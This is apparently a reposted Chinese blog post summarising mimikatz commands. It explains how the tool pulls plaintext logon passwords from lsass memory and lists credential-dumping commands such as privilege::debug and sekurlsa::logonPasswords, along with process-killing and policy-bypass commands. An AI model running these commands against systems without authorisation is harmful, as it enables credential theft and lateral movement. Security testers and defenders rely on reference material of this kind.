zoukankan      html  css  js  c++  java
  • 神器mimikatz使用命令方法总结

    神器mimikatz使用命令方法总结

    文章地址:http://www.isharepc.com/300.html

    mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

    下面简单的介绍一下神器的命令

    • cls-----------------------------清屏
    • exit----------------------------退出
    • version------------查看mimikatz的版本
    • system::user-----查看当前登录的系统用户
    • system::computer-------查看计算机名称
    • process::list------------------列出进程
    • process::suspend 进程名称 -----暂停进程
    • process::stop 进程名称---------结束进程
    • process::modules --列出系统的核心模块及所在位置
    • service::list---------------列出系统的服务
    • service::remove-----------移除系统的服务
    • service::start stop 服务名称--启动或停止服务
    • privilege::list---------------列出权限列表
    • privilege::enable--------激活一个或多个权限
    • privilege::debug-----------------提升权限
    • nogpo::cmd------------打开系统的cmd.exe
    • nogpo::regedit -----------打开系统的注册表
    • nogpo::taskmgr-------------打开任务管理器
    • ts::sessions-----------------显示当前的会话
    • ts::processes------显示进程和对应的pid情况等
    • sekurlsa::wdigest-----获取本地用户信息及密码
    • sekurlsa::tspkg------获取tspkg用户信息及密码
    • sekurlsa::logonPasswords--获登陆用户信息及密码

    在网上找了一篇,但是和我的工具不是一样

    文章地址:http://www.2cto.com/article/201407/318229.html

    ps:copy~

    mimikatz是法国的一位神牛写的神器,该神器有很强大的功能,据说已经被集成在metasplo

    1.常规的操作使用命令

    mimikatz # cls -->清屏,类似dos命令cls.

    mimikatz # exit -->退出mimikatz.

    mimikatz #version -->查看当前的mimikatz的版本.

    随便输入"xxx::",会提示"modules:'xxx' intr0uvable",大概意思就是你输入的命令不存在,然后会列出所有可用的命令

    mimikatz命令

    查看列表中命令的具体参数同样可以输入"命令::"来查看,比如:"inject::",如图:

    mimikatz使用方法

    可以看到命令inject的具体参数有pid,process,service等……

    2.系统方面的操作使用命令:system

    mimikatz #system::user -->查看当前登录的系统用户

    mimikazt #system::computer -->返回当前的计算机名称

    3.在服务器终端的操作命令: ts

    mimikatz #ts::sessions -->显示当前的会话

    mimikatz #ts::processes windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid情况等。

    4.系统服务相关的操作使用命令:service

    5.系统进程相关操作的使用命令:process

    6.系统线程相关操作使用命令:thread

    7.系统句柄相关操作使用命令:handle

    8.加密相关操作使用命令:crypto

    9.注入操作使用命令:inject

    具体的各种神器功能使用有待神人挖掘,表示不会外文压力很大……

    分享从lsass抓去系统的明文密码案例

  • 相关阅读:
    Linux----硬连接和软连接
    C4.5算法
    浅谈机器学习方法
    ID3算法(决策树)
    修改mysql数据库 允许远程访问
    CentOS 7安装Samba 4.6 版本步骤及错误解决方法
    CentOS安装mysql
    eclipse 安装lombok插件
    电脑忘记密码,破解方式
    mysql常用的信息查询函数
  • 原文地址:https://www.cnblogs.com/pursuitofacm/p/6704219.html
Copyright © 2011-2022 走看看